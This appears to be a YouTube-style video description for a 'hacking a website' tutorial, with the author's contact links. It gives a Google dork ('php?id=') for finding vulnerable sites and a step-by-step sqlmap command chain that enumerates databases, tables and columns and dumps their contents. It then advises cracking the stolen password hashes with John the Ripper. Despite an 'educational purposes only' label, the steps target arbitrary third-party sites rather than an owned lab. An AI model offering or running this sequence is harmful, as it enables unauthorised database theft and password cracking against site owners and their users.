Videos

Published on July 8th, 2016 📆 | 3776 Views ⚑

0

Kali Linux | Hacking a website


iSpeech


WARNING: For Educational Purposes Only!
In this video i will show you how to hack vulnerable site with Sqlmap in Kali Linux.

You will need these commands:
For that search "php?id=" in google.

Sqlmap commands:
sqlmap -u "targetwebsite.com" --dbs
(the above command gets the database of the website)

sqlmap -u "targetwebsite.com" -D "selected_database" --tables
(It will get the list of tables from the website )

sqlmap -u "targetwebsite.com" -D "selected_database" -T "selected_table" --columns
(list the columns of selected table)

sqlmap -u "targetwebsite.com" -D "selected_database" -T "selected_table" -C "selected_column" --dump
(list the data )

The password are hashed you have to decrypt it. You can use john the ripper or whatever you want.





Kali Linux is a very popular operating system that is designed for digital forensics and penetration testing. It comes with a set of forensic and security tools wrapped in a Linux distro based on Debian. Kali is designed to assist security experts in determining weaknesses in computer systems. Also, Kali Linux is used by professionals in fields like security, defense, journalism, etc.

music: Right Here (feat. Foxes) - Rudimental
Mind Heist

If you like the video let me know by hitting the Like button. Subscribe for more videos!

Also visit my website https://hackingtutorialssite.wordpress.com/
There you can find some interesting tutorials and Downloads for some hacking programs.

You can find me in:
skype: bobi_i_aleks
twitter: https://twitter.com/bobistutorials
facebook: https://www.facebook.com/BobisLessons/
gmail: bobcho3210@gmail.com
bobis_lessons@abv.bg


2016-07-08 08:32:49

source

Tagged with:



Comments are closed.